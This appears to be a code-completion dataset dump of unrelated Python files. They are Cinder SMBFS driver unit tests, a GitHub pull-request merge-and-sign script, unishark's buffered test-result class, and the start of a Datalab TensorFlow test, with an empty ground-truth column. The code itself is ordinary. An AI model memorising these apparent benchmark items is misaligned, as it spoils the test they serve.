gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
# Copyright 2014 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_utils import units
from cinder import exception
from cinder.image import image_utils
from cinder import test
from cinder.volume.drivers.windows import smbfs
class WindowsSmbFsTestCase(test.TestCase):
    """Unit tests for the Windows SMBFS cinder volume driver.

    All Windows utility layers (vhdutils, smbutils, remotefs) are mocked,
    so the tests only assert how the driver calls into them.
    """

    _FAKE_SHARE = '//1.2.3.4/share1'
    # NOTE(review): not a raw string; '\o' and '\m' are unrecognized escapes
    # and stay literal backslashes, but r'c:\openstack\mnt' would be safer.
    _FAKE_MNT_BASE = 'c:\openstack\mnt'
    _FAKE_MNT_POINT = os.path.join(_FAKE_MNT_BASE, 'fake_hash')
    _FAKE_VOLUME_NAME = 'volume-4f711859-4928-4cb7-801a-a50c37ceaccc'
    _FAKE_SNAPSHOT_NAME = _FAKE_VOLUME_NAME + '-snapshot.vhdx'
    _FAKE_SNAPSHOT_PATH = os.path.join(_FAKE_MNT_POINT,
                                       _FAKE_SNAPSHOT_NAME)
    _FAKE_TOTAL_SIZE = '2048'
    _FAKE_TOTAL_AVAILABLE = '1024'
    _FAKE_TOTAL_ALLOCATED = 1024
    _FAKE_VOLUME = {'id': 'e8d76af4-cbb9-4b70-8e9e-5a133f1a1a66',
                    'size': 1,
                    'provider_location': _FAKE_SHARE}
    _FAKE_SNAPSHOT = {'id': '35a23942-7625-4683-ad84-144b76e87a80',
                      'volume': _FAKE_VOLUME,
                      'volume_size': _FAKE_VOLUME['size']}
    _FAKE_SHARE_OPTS = '-o username=Administrator,password=12345'
    _FAKE_VOLUME_PATH = os.path.join(_FAKE_MNT_POINT,
                                     _FAKE_VOLUME_NAME + '.vhdx')

    @mock.patch.object(smbfs, 'utilsfactory')
    @mock.patch.object(smbfs, 'remotefs')
    def setUp(self, mock_remotefs, mock_utilsfactory):
        # Build the driver with the utils factory and remotefs module patched
        # out, then stub the helpers most tests rely on.
        super(WindowsSmbFsTestCase, self).setUp()
        self._smbfs_driver = smbfs.WindowsSmbfsDriver(
            configuration=mock.Mock())
        self._smbfs_driver._delete = mock.Mock()
        self._smbfs_driver.local_path = mock.Mock(
            return_value=self._FAKE_VOLUME_PATH)

    def _test_create_volume(self, volume_exists=False, volume_format='vhdx'):
        """Exercise _do_create_volume for the given preconditions.

        Expects InvalidVolume when the image file already exists or the
        format is not vhd/vhdx; otherwise expects a dynamic VHD to be
        created with the volume size converted from GB to bytes (<< 30).
        """
        self._smbfs_driver.create_dynamic_vhd = mock.MagicMock()
        fake_create = self._smbfs_driver._vhdutils.create_dynamic_vhd
        self._smbfs_driver.get_volume_format = mock.Mock(
            return_value=volume_format)

        with mock.patch('os.path.exists', new=lambda x: volume_exists):
            if volume_exists or volume_format not in ('vhd', 'vhdx'):
                self.assertRaises(exception.InvalidVolume,
                                  self._smbfs_driver._do_create_volume,
                                  self._FAKE_VOLUME)
            else:
                fake_vol_path = self._FAKE_VOLUME_PATH
                self._smbfs_driver._do_create_volume(self._FAKE_VOLUME)
                fake_create.assert_called_once_with(
                    fake_vol_path, self._FAKE_VOLUME['size'] << 30)

    def test_create_volume(self):
        self._test_create_volume()

    def test_create_existing_volume(self):
        self._test_create_volume(True)

    def test_create_volume_invalid_volume(self):
        self._test_create_volume(volume_format="qcow")

    def test_get_capacity_info(self):
        # _get_capacity_info should return (total, available, allocated)
        # coerced to ints.
        self._smbfs_driver._smbutils.get_share_capacity_info.return_value = (
            self._FAKE_TOTAL_SIZE, self._FAKE_TOTAL_AVAILABLE)
        self._smbfs_driver._get_total_allocated = mock.Mock(
            return_value=self._FAKE_TOTAL_ALLOCATED)

        ret_val = self._smbfs_driver._get_capacity_info(self._FAKE_SHARE)
        expected_ret_val = [int(x) for x in [self._FAKE_TOTAL_SIZE,
                                             self._FAKE_TOTAL_AVAILABLE,
                                             self._FAKE_TOTAL_ALLOCATED]]
        self.assertEqual(expected_ret_val, ret_val)

    def _test_get_img_info(self, backing_file=None):
        """Check _qemu_img_info reports image basename and backing file."""
        self._smbfs_driver._vhdutils.get_vhd_parent_path.return_value = (
            backing_file)

        image_info = self._smbfs_driver._qemu_img_info(self._FAKE_VOLUME_PATH)
        self.assertEqual(self._FAKE_VOLUME_NAME + '.vhdx',
                         image_info.image)
        backing_file_name = backing_file and os.path.basename(backing_file)
        self.assertEqual(backing_file_name, image_info.backing_file)

    def test_get_img_info_without_backing_file(self):
        self._test_get_img_info()

    def test_get_snapshot_info(self):
        self._test_get_img_info(self._FAKE_VOLUME_PATH)

    def test_create_snapshot(self):
        # Snapshots are differencing VHDs pointing at the volume image.
        self._smbfs_driver._vhdutils.create_differencing_vhd = (
            mock.Mock())
        self._smbfs_driver._local_volume_dir = mock.Mock(
            return_value=self._FAKE_MNT_POINT)

        fake_create_diff = (
            self._smbfs_driver._vhdutils.create_differencing_vhd)

        self._smbfs_driver._do_create_snapshot(
            self._FAKE_SNAPSHOT,
            os.path.basename(self._FAKE_VOLUME_PATH),
            self._FAKE_SNAPSHOT_PATH)

        fake_create_diff.assert_called_once_with(self._FAKE_SNAPSHOT_PATH,
                                                 self._FAKE_VOLUME_PATH)

    def _test_copy_volume_to_image(self, has_parent=False,
                                   volume_format='vhd'):
        """Exercise copy_volume_to_image.

        When the volume has a parent (snapshot) or is vhdx, the driver is
        expected to convert to a temporary vhd, upload that, and delete the
        temporary file; otherwise the volume file is uploaded directly.
        """
        drv = self._smbfs_driver

        fake_image_meta = {'id': 'fake-image-id'}

        if has_parent:
            fake_volume_path = self._FAKE_SNAPSHOT_PATH
            fake_parent_path = self._FAKE_VOLUME_PATH
        else:
            fake_volume_path = self._FAKE_VOLUME_PATH
            fake_parent_path = None

        if volume_format == drv._DISK_FORMAT_VHD:
            # Strip the trailing 'x' of '.vhdx' to get a '.vhd' path.
            fake_volume_path = fake_volume_path[:-1]

        fake_active_image = os.path.basename(fake_volume_path)

        drv.get_active_image_from_info = mock.Mock(
            return_value=fake_active_image)
        drv._local_volume_dir = mock.Mock(
            return_value=self._FAKE_MNT_POINT)
        drv.get_volume_format = mock.Mock(
            return_value=volume_format)
        drv._vhdutils.get_vhd_parent_path.return_value = (
            fake_parent_path)

        with mock.patch.object(image_utils, 'upload_volume') as (
                fake_upload_volume):
            drv.copy_volume_to_image(
                mock.sentinel.context, self._FAKE_VOLUME,
                mock.sentinel.image_service, fake_image_meta)

            expected_conversion = (
                has_parent or volume_format == drv._DISK_FORMAT_VHDX)

            if expected_conversion:
                fake_temp_image_name = '%s.temp_image.%s.%s' % (
                    self._FAKE_VOLUME['id'],
                    fake_image_meta['id'],
                    drv._DISK_FORMAT_VHD)
                fake_temp_image_path = os.path.join(
                    self._FAKE_MNT_POINT,
                    fake_temp_image_name)
                fake_active_image_path = os.path.join(
                    self._FAKE_MNT_POINT,
                    fake_active_image)
                upload_path = fake_temp_image_path

                drv._vhdutils.convert_vhd.assert_called_once_with(
                    fake_active_image_path,
                    fake_temp_image_path)
                drv._delete.assert_called_once_with(
                    fake_temp_image_path)
            else:
                upload_path = fake_volume_path

            fake_upload_volume.assert_called_once_with(
                mock.sentinel.context, mock.sentinel.image_service,
                fake_image_meta, upload_path, drv._DISK_FORMAT_VHD)

    def test_copy_volume_to_image_having_snapshot(self):
        self._test_copy_volume_to_image(has_parent=True)

    def test_copy_vhdx_volume_to_image(self):
        self._test_copy_volume_to_image(volume_format='vhdx')

    def test_copy_vhd_volume_to_image(self):
        self._test_copy_volume_to_image(volume_format='vhd')

    def test_copy_image_to_volume(self):
        # Fetching the image should convert it to the volume format and then
        # resize the resulting VHD to the requested volume size.
        drv = self._smbfs_driver

        drv.get_volume_format = mock.Mock(
            return_value=mock.sentinel.volume_format)
        drv.local_path = mock.Mock(
            return_value=self._FAKE_VOLUME_PATH)
        drv.configuration = mock.MagicMock()
        drv.configuration.volume_dd_blocksize = mock.sentinel.block_size

        with mock.patch.object(image_utils,
                               'fetch_to_volume_format') as fake_fetch:
            drv.copy_image_to_volume(
                mock.sentinel.context, self._FAKE_VOLUME,
                mock.sentinel.image_service,
                mock.sentinel.image_id)
            fake_fetch.assert_called_once_with(
                mock.sentinel.context,
                mock.sentinel.image_service,
                mock.sentinel.image_id,
                self._FAKE_VOLUME_PATH, mock.sentinel.volume_format,
                mock.sentinel.block_size)
            drv._vhdutils.resize_vhd.assert_called_once_with(
                self._FAKE_VOLUME_PATH,
                self._FAKE_VOLUME['size'] * units.Gi)

    def test_copy_volume_from_snapshot(self):
        # Creating a volume from a snapshot should convert the snapshot's
        # backing file into a new image and resize it.
        drv = self._smbfs_driver

        fake_volume_info = {
            self._FAKE_SNAPSHOT['id']: 'fake_snapshot_file_name'}
        fake_img_info = mock.MagicMock()
        fake_img_info.backing_file = self._FAKE_VOLUME_NAME + '.vhdx'

        drv._local_path_volume_info = mock.Mock(
            return_value=self._FAKE_VOLUME_PATH + '.info')
        drv._local_volume_dir = mock.Mock(
            return_value=self._FAKE_MNT_POINT)

        drv._read_info_file = mock.Mock(
            return_value=fake_volume_info)
        drv._qemu_img_info = mock.Mock(
            return_value=fake_img_info)
        drv.local_path = mock.Mock(
            return_value=mock.sentinel.new_volume_path)

        drv._copy_volume_from_snapshot(
            self._FAKE_SNAPSHOT, self._FAKE_VOLUME,
            self._FAKE_VOLUME['size'])

        drv._delete.assert_called_once_with(mock.sentinel.new_volume_path)
        drv._vhdutils.convert_vhd.assert_called_once_with(
            self._FAKE_VOLUME_PATH,
            mock.sentinel.new_volume_path)
        drv._vhdutils.resize_vhd.assert_called_once_with(
            mock.sentinel.new_volume_path,
            self._FAKE_VOLUME['size'] * units.Gi)

    def test_rebase_img(self):
        # Rebasing delegates to vhdutils to reconnect the parent VHD.
        drv = self._smbfs_driver
        drv._rebase_img(
            self._FAKE_SNAPSHOT_PATH,
            self._FAKE_VOLUME_NAME + '.vhdx', 'vhdx')
        drv._vhdutils.reconnect_parent_vhd.assert_called_once_with(
            self._FAKE_SNAPSHOT_PATH, self._FAKE_VOLUME_PATH)
|
|
#!/usr/bin/env python2
# Copyright (c) 2016 Bitcredit Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os,sys
from sys import stdin,stdout,stderr
import argparse
import subprocess
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')

# OS specific configuration for terminal attributes.
# Defaults are plain (no color) for non-POSIX terminals.
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
    ATTR_RESET = '\033[0m'
    ATTR_PR = '\033[1;36m'
    # Colorized git pretty-format used when showing the commits being merged.
    COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
    '''
    Get named configuration option from git repository.

    Returns the option's value with trailing whitespace stripped, or
    *default* when the option is unset (git exits non-zero).
    '''
    try:
        return subprocess.check_output([GIT,'config','--get',option]).rstrip()
    except subprocess.CalledProcessError:
        # Unused exception variable removed: the option simply is not set
        # (or git failed), so fall back to the caller-supplied default.
        return default
def retrieve_pr_title(repo,pull):
    '''
    Retrieve pull request title from github.
    Return None if no title can be found, or an error happens.
    '''
    import urllib2,json
    try:
        # Everything stays inside the try: URL building, the HTTP request,
        # JSON decoding and the key lookup may all fail.
        request = urllib2.Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
        payload = json.load(urllib2.urlopen(request))
        return payload['title']
    except Exception as exc:
        print('Warning: unable to retrieve pull title from github: %s' % exc)
        return None
def ask_prompt(text):
    '''Show *text* on stderr and return one whitespace-stripped line from stdin.'''
    print(text, end=" ", file=stderr)
    answer = stdin.readline().rstrip()
    # Trailing newline on stderr keeps subsequent output on a fresh line.
    print("", file=stderr)
    return answer
def parse_arguments(branch):
    '''Parse the command line: a mandatory PULL id plus an optional BRANCH.

    *branch* supplies the default target branch shown in the help text.
    '''
    epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: git@github.com),
githubmerge.branch (default: master),
githubmerge.testcmd (default: none).
'''
    parser = argparse.ArgumentParser(
        description='Utility to merge, sign and push github pull requests',
        epilog=epilog)
    parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
                        help='Pull request ID to merge')
    parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
                        default=branch,
                        help='Branch to merge against (default: '+branch+')')
    return parser.parse_args()
def main():
    """Fetch a github pull request, merge it locally, verify, sign and push.

    Exit codes: 1 config/signing problems, 3 fetch/checkout failures,
    4 merge failures, 5 test command failure, 6 diff rejected,
    7 merge rejected in the interactive shell.
    """
    # Extract settings from git repo
    repo = git_config_get('githubmerge.repository')
    host = git_config_get('githubmerge.host','git@github.com')
    branch = git_config_get('githubmerge.branch','master')
    testcmd = git_config_get('githubmerge.testcmd')
    signingkey = git_config_get('user.signingkey')
    if repo is None:
        print("ERROR: No repository configured. Use this command to set:", file=stderr)
        print("git config githubmerge.repository <owner>/<repo>", file=stderr)
        exit(1)
    if signingkey is None:
        print("ERROR: No GPG signing key set. Set one using:",file=stderr)
        print("git config --global user.signingkey <key>",file=stderr)
        exit(1)
    host_repo = host+":"+repo # shortcut for push/pull target

    # Extract settings from command line
    args = parse_arguments(branch)
    pull = str(args.pull[0])
    branch = args.branch

    # Initialize source branches (temporary, deleted in the finally block).
    head_branch = 'pull/'+pull+'/head'
    base_branch = 'pull/'+pull+'/base'
    merge_branch = 'pull/'+pull+'/merge'
    local_merge_branch = 'pull/'+pull+'/local-merge'

    devnull = open(os.devnull,'w')
    try:
        subprocess.check_call([GIT,'checkout','-q',branch])
    except subprocess.CalledProcessError as e:
        print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
        exit(3)
    try:
        # Fetch all refs of the pull request (head, merge) into local branches.
        subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*'])
    except subprocess.CalledProcessError as e:
        print("ERROR: Cannot find pull request #%s on %s." % (pull,host_repo), file=stderr)
        exit(3)
    try:
        # Probe that the head ref exists; output is discarded.
        # NOTE(review): stderr=stdout here looks odd (stdout goes to devnull
        # while stderr goes to the real stdout) — presumably intentional to
        # surface git errors; confirm before changing.
        subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
    except subprocess.CalledProcessError as e:
        print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
        exit(3)
    try:
        # Probe that github's pre-computed merge ref exists.
        subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
    except subprocess.CalledProcessError as e:
        print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
        exit(3)
    try:
        # Snapshot the current remote state of the target branch.
        subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/heads/'+branch+':refs/heads/'+base_branch])
    except subprocess.CalledProcessError as e:
        print("ERROR: Cannot find branch %s on %s." % (branch,host_repo), file=stderr)
        exit(3)
    subprocess.check_call([GIT,'checkout','-q',base_branch])
    subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
    subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])

    try:
        # Create unsigned merge commit.
        title = retrieve_pr_title(repo,pull)
        if title:
            firstline = 'Merge #%s: %s' % (pull,title)
        else:
            firstline = 'Merge #%s' % (pull,)
        message = firstline + '\n\n'
        # Append the list of merged commits to the commit message body.
        message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
        try:
            subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
        except subprocess.CalledProcessError as e:
            print("ERROR: Cannot be merged cleanly.",file=stderr)
            subprocess.check_call([GIT,'merge','--abort'])
            exit(4)
        logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
        if logmsg.rstrip() != firstline.rstrip():
            # A fast-forward (no merge commit) means there was nothing to merge.
            print("ERROR: Creating merge failed (already merged?).",file=stderr)
            exit(4)

        print('%s#%s%s %s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title))
        subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
        print()
        # Run test command if configured.
        if testcmd:
            # Go up to the repository's root.
            toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
            os.chdir(toplevel)
            if subprocess.call(testcmd,shell=True):
                print("ERROR: Running %s failed." % testcmd,file=stderr)
                exit(5)

            # Show the created merge.
            diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
            subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
            if diff:
                print("WARNING: merge differs from github!",file=stderr)
                reply = ask_prompt("Type 'ignore' to continue.")
                if reply.lower() == 'ignore':
                    print("Difference with github ignored.",file=stderr)
                else:
                    exit(6)
            reply = ask_prompt("Press 'd' to accept the diff.")
            if reply.lower() == 'd':
                print("Diff accepted.",file=stderr)
            else:
                print("ERROR: Diff rejected.",file=stderr)
                exit(6)
        else:
            # Verify the result manually.
            print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
            print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
            print("Type 'exit' when done.",file=stderr)
            if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
                os.putenv('debian_chroot',pull)
            subprocess.call([BASH,'-i'])
            reply = ask_prompt("Type 'm' to accept the merge.")
            if reply.lower() == 'm':
                print("Merge accepted.",file=stderr)
            else:
                print("ERROR: Merge rejected.",file=stderr)
                exit(7)

        # Sign the merge commit.
        reply = ask_prompt("Type 's' to sign off on the merge.")
        if reply == 's':
            try:
                subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
            except subprocess.CalledProcessError as e:
                print("Error signing, exiting.",file=stderr)
                exit(1)
        else:
            print("Not signing off on merge, exiting.",file=stderr)
            exit(1)

        # Put the result in branch.
        subprocess.check_call([GIT,'checkout','-q',branch])
        subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
    finally:
        # Clean up temporary branches.
        subprocess.call([GIT,'checkout','-q',branch])
        subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
        subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
        subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
        subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)

    # Push the result.
    reply = ask_prompt("Type 'push' to push the result to %s, branch %s." % (host_repo,branch))
    if reply.lower() == 'push':
        subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])

if __name__ == '__main__':
    main()
|
|
# Copyright 2015 Twitter, Inc and other contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TextTestResult
import time
from sys import stdout, stderr, version_info
import traceback
from unishark.util import (get_long_class_name, get_long_method_name, get_module_name)
import threading
from collections import deque
from inspect import ismodule
# unittest's private stream wrapper, fetched via getattr because the name
# starts with an underscore.
WritelnDecorator = getattr(getattr(__import__('unittest'), 'runner'), '_WritelnDecorator')

# _io is the module providing StringIO: 'StringIO' on Python 2, 'io' on 3.
_io = None
if version_info[0] < 3:  # Python2.x (2.7)
    _io = __import__('StringIO')

    # Try making instance method picklable (for multiprocessing) in Python2
    # No need to do this in Python3.x
    def _reduce_method(m):
        # Reduce a bound/unbound method to (getattr, (owner, name)) so that
        # pickle can reconstruct it on the other side.
        if m.im_self is None:
            return getattr, (m.im_class, m.im_func.func_name)
        else:
            return getattr, (m.im_self, m.im_func.func_name)

    copy_reg = __import__('copy_reg')
    types = __import__('types')
    copy_reg.pickle(types.MethodType, _reduce_method)
else:  # Python3.x
    _io = __import__('io')

# Fail fast if the StringIO provider could not be resolved to a module.
if _io is None or not ismodule(_io):
    raise ImportError
def _make_buffer():
    # Return a fresh in-memory text buffer (StringIO of the running Python).
    return _io.StringIO()
class _PooledIOBuffer(object):
    """Per-thread output buffering backed by a pool of reusable StringIOs.

    Each thread writes into its own buffer, keyed by thread ident in
    ``buff_dict``; ``free`` clears the buffer and recycles it into
    ``buff_queue`` for later reuse by any thread.
    """

    # Class-level lock guarding the shared buffer pool.
    _lock = threading.RLock()

    def __init__(self):
        # Pool of idle, reusable buffers; seed it with one.
        self.buff_queue = deque()
        self.buff_queue.append(_make_buffer())
        # thread ident -> buffer currently owned by that thread.
        self.buff_dict = dict()

    def _get_buff(self):
        """Pop a pooled buffer, or create a new one when the pool is empty."""
        with _PooledIOBuffer._lock:
            if not self.buff_queue:
                return _make_buffer()
            else:
                return self.buff_queue.popleft()

    def write(self, *args, **kwargs):
        """Write to the calling thread's buffer, allocating one on first use."""
        i = threading.current_thread().ident
        if i not in self.buff_dict:
            buff = self._get_buff()
            self.buff_dict[i] = buff
        self.buff_dict[i].write(*args, **kwargs)

    def getvalue(self, *args, **kwargs):
        """Return the calling thread's buffered text, or None if it has none."""
        i = threading.current_thread().ident
        return self.buff_dict[i].getvalue(*args, **kwargs) if i in self.buff_dict else None

    def flush(self, *args, **kwargs):
        i = threading.current_thread().ident
        if i in self.buff_dict:
            self.buff_dict[i].flush(*args, **kwargs)

    def seek(self, *args, **kwargs):
        i = threading.current_thread().ident
        if i in self.buff_dict:
            self.buff_dict[i].seek(*args, **kwargs)

    def truncate(self, *args, **kwargs):
        i = threading.current_thread().ident
        if i in self.buff_dict:
            self.buff_dict[i].truncate(*args, **kwargs)

    def free(self):
        """Release the calling thread's buffer back to the pool, emptied."""
        i = threading.current_thread().ident
        if i in self.buff_dict:
            # Fix: reuse the ident already computed instead of re-reading
            # threading.current_thread().ident a second time.
            buff = self.buff_dict.pop(i)
            buff.seek(0)
            buff.truncate()
            # Fix: guard the shared pool with the same lock _get_buff takes,
            # making pool access consistently synchronized.
            with _PooledIOBuffer._lock:
                self.buff_queue.append(buff)
# Shared pooled buffer used to capture per-thread test output; `out` is the
# public alias tests write to.
_io_buffer = _PooledIOBuffer()
out = _io_buffer

# Status codes stored in result tuples (see BufferedTestResult.results).
PASS = 0
SKIPPED = 1
ERROR = 2
FAIL = 3
EXPECTED_FAIL = 4
UNEXPECTED_PASS = 5
class BufferedTestResult(TextTestResult):
    """TextTestResult that records per-test output, duration and status.

    Results are stored as ``results[module_name][class_name] = [tuple, ...]``
    where each tuple is (test method name, method doc, duration, status,
    output, traceback), so results can be pickled across processes and
    merged with combine_results().
    """

    def __init__(self, stream, descriptions, verbosity):
        super(BufferedTestResult, self).__init__(stream, descriptions, verbosity)
        # unittest's built-in buffering is disabled; output is captured by the
        # module-level pooled buffer instead.
        self.buffer = False
        # key: module_name.class_name, value: a list of results.
        # One result is a tuple like (test method name, method doc, duration, status, output, traceback)
        self.results = dict()
        self.start_time = 0.0
        self.sum_duration = 0.0
        self.successes = 0
        self.name = 'test'
        self.description = ''
        self.children = []

    def __len__(self):
        return len(self.children)

    def __iter__(self):
        return iter(self.children)

    def __getstate__(self):
        # called before pickling; streams cannot be pickled, so drop them.
        state = self.__dict__.copy()
        if 'stream' in state:
            del state['stream']
        if '_original_stderr' in state:
            del state['_original_stderr']
        if '_original_stdout' in state:
            del state['_original_stdout']
        return state

    def __setstate__(self, state):
        # called while unpickling; re-attach fresh streams for this process.
        self.__dict__.update(state)
        self.__dict__['stream'] = WritelnDecorator(stderr)
        self.__dict__['_original_stderr'] = stderr
        self.__dict__['_original_stdout'] = stdout

    def _add_result(self, test, duration, status, output, trace_back):
        # Append one result tuple under results[module][class].
        mod_name = get_module_name(test)
        cls_name = get_long_class_name(test)
        if mod_name not in self.results:
            self.results[mod_name] = dict()
        if cls_name not in self.results[mod_name]:
            self.results[mod_name][cls_name] = []
        test_name, test_doc = self.__class__._get_test_info(test)
        output = output or 'No Log\n'
        trace_back = trace_back or 'No Exception\n'
        self.results[mod_name][cls_name].append((test_name, test_doc, duration, status, output, trace_back))

    @staticmethod
    def _get_test_info(test):
        # Return (long method name, method docstring-or-placeholder).
        test_name = get_long_method_name(test)
        test_doc = getattr(test, '_testMethodDoc', None)
        return test_name, test_doc or 'No Method Doc\n'

    def _exc_info_to_string(self, error, test):
        """Almost the same as its base class implementation, except eliminating the mirror output"""
        exctype, value, tb = error
        # Skip test runner traceback levels
        while tb and self._is_relevant_tb_level(tb):
            tb = tb.tb_next
        if exctype is test.failureException:
            # Skip assert*() traceback levels
            length = self._count_relevant_tb_levels(tb)
            msg_lines = traceback.format_exception(exctype, value, tb, length)
        else:
            msg_lines = traceback.format_exception(exctype, value, tb)
        return ''.join(msg_lines)

    def startTest(self, test):
        # Record the wall-clock start so add* hooks can compute the duration.
        super(BufferedTestResult, self).startTest(test)
        self.start_time = time.time()

    def stopTest(self, test):
        self._mirrorOutput = False
        # Recycle this thread's output buffer for the next test.
        _io_buffer.free()
        # In Python3.3,
        # clear the exceptions info (from sys.exc_info()) stored in the test case obj after the test case runs,
        # for traceback cannot be pickled during multiprocessing.
        # It is OK to clear them because the exceptions info is already converted to strings
        # and stored in the result obj by addFailure, addError or addExpectedFailure.
        # Versions above Python3.3 already have the following cleanup steps in unittest.case.TestCase.run
        if version_info[:2] == (3, 3):
            outcome = getattr(test, '_outcomeForDoCleanups', None) or getattr(test, '_outcome', None)
            if outcome:
                if getattr(outcome, 'unexpectedSuccess', None):
                    outcome.unexpectedSuccess = None
                if getattr(outcome, 'expectedFailure', None):
                    outcome.expectedFailure = None
                if getattr(outcome, 'errors', None):
                    outcome.errors.clear()
                if getattr(outcome, 'failures', None):
                    outcome.failures.clear()

    def addSuccess(self, test):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addSuccess(test)
        self.successes += 1
        self._add_result(test, duration, PASS, _io_buffer.getvalue(), '')

    def addError(self, test, error):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addError(test, error)
        # The base class already formatted the exception; reuse its string.
        test_obj, exception_str = self.errors[-1]
        self._add_result(test, duration, ERROR, _io_buffer.getvalue(), exception_str)

    def addFailure(self, test, error):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addFailure(test, error)
        test_obj, exception_str = self.failures[-1]
        self._add_result(test, duration, FAIL, _io_buffer.getvalue(), exception_str)

    def addSkip(self, test, reason):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addSkip(test, reason)
        test_obj, reason = self.skipped[-1]
        self._add_result(test, duration, SKIPPED, _io_buffer.getvalue(), 'Skipped: {0!r}'.format(reason))

    def addExpectedFailure(self, test, error):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addExpectedFailure(test, error)
        test_obj, exception_str = self.expectedFailures[-1]
        self._add_result(test, duration, EXPECTED_FAIL, _io_buffer.getvalue(), exception_str)

    def addUnexpectedSuccess(self, test):
        duration = time.time() - self.start_time
        super(BufferedTestResult, self).addUnexpectedSuccess(test)
        self._add_result(test, duration, UNEXPECTED_PASS, _io_buffer.getvalue(), '')

    def wasSuccessful(self):
        # Unlike the base class, unexpected successes also count as failure.
        return len(self.failures) == len(self.errors) == len(self.unexpectedSuccesses) == 0
def combine_results(result, results):
    """Merge every result object in *results* into *result*, in place.

    List attributes are extended, counters are summed, and the nested
    ``results[module][class]`` lists are concatenated.
    """
    for partial in results:
        result.failures.extend(partial.failures)
        result.errors.extend(partial.errors)
        result.testsRun += partial.testsRun
        result.skipped.extend(partial.skipped)
        result.expectedFailures.extend(partial.expectedFailures)
        result.unexpectedSuccesses.extend(partial.unexpectedSuccesses)
        result.successes += partial.successes
        for mod_name, classes in partial.results.items():
            dest_mod = result.results.setdefault(mod_name, dict())
            for cls_name, tuples in classes.items():
                dest_mod.setdefault(cls_name, []).extend(tuples)
|
|
from __future__ import absolute_import
from __future__ import print_function
import json
import os
import pandas as pd
from PIL import Image
import shutil
from six.moves.urllib.request import urlopen
import subprocess
import tempfile
import unittest
import uuid
import tensorflow as tf
from tensorflow.python.lib.io import file_io
import google.datalab as dl
import google.datalab.bigquery as bq
import google.datalab.storage as storage
# Directory holding analyze.py / transform.py, resolved relative to this file.
CODE_PATH = os.path.abspath(os.path.join(
    os.path.dirname(__file__), '..', 'tensorflow'))

# TODO: travis tests failed because sometimes a VM has gcloud signed-in
# (maybe due to failed cleanup) with default project set and BQ is not enabled.
